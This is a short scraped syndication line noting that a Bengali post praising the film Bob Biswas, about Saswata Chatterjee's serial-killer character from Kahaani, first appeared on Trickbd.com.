The post Bob Biswas: “কাহিনী” মুভিতে সিরিয়াল কিলার হিসেবে অভিনয় করা শাশ্বত চট্টোপাধ্যায়ের বায়োপিক নিয়ে নির্মিত অসাধারণ মুভি। appeared first on Trickbd.com.

Post a Comment

0 Comments